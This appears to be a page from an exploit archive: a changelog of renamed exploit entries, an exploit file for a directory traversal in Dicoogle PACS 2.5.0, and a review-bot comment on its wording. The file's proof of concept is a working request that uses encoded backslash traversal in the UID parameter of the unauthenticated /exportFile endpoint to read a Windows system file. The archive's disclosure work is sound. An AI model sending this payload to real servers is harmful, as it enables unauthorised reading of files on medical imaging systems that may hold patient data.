
8 changes to exploits/shellcodes

Adobe Flash Player 10.0.22 and AIR - 'intf_count' Integer Overflow
Adobe Flash Player 10.0.22 / AIR - 'intf_count' Integer Overflow
Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes
Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read
Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions
VLC media player 2.2.8 - Arbitrary Code Execution (PoC)
Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation
212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities
212Cafe Board 0.08 Beta / 6.30 Beta - Multiple Cross-Site Scripting Vulnerabilities
123 Flash Chat - Multiple Vulnerabilities
123 Flash Chat 7.8 - Multiple Vulnerabilities
Dicoogle PACS 2.5.0 - Directory Traversal
19 lines
No EOL
830 B
Text
# Exploit Title: Dicoogle PACS 2.5.0 - Directory Traversal
# Date: 2018-05-25
# Software Link: http://www.dicoogle.com/home
# Version: Dicoogle PACS 2.5.0-20171229_1522
# Category: webapps
# Tested on: Windows 2012 R2
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt
# 1. Description
# Dicoogle is an open source medical imaging repository with an extensible
# indexing system and distributed mechanisms. In version 2.5.0, it is vulnerable
# to local file inclusion. This allows an attacker to read arbitrary files that the
# web user has access to. Admin credentials aren't required. The ‘UID’ parameter
# via GET is vulnerable.
# 2. Proof of Concept
http://Target:8080/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini |
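
Review bot: The description calls this "local file inclusion", but the title says Directory Traversal and the proof of concept is a file read through backslash traversal in the UID parameter of /exportFile, so the description should use the title's term to keep the entry's classification consistent. The header lists only the affected build (2.5.0-20171229_1522) and a single test platform (Windows 2012 R2); the write-up should say whether a fixed release exists and make clear that only the %5c separator on Windows was tested. The typographic quotes around ‘UID’ are the only non-ASCII characters in the file and should be plain ASCII quotes.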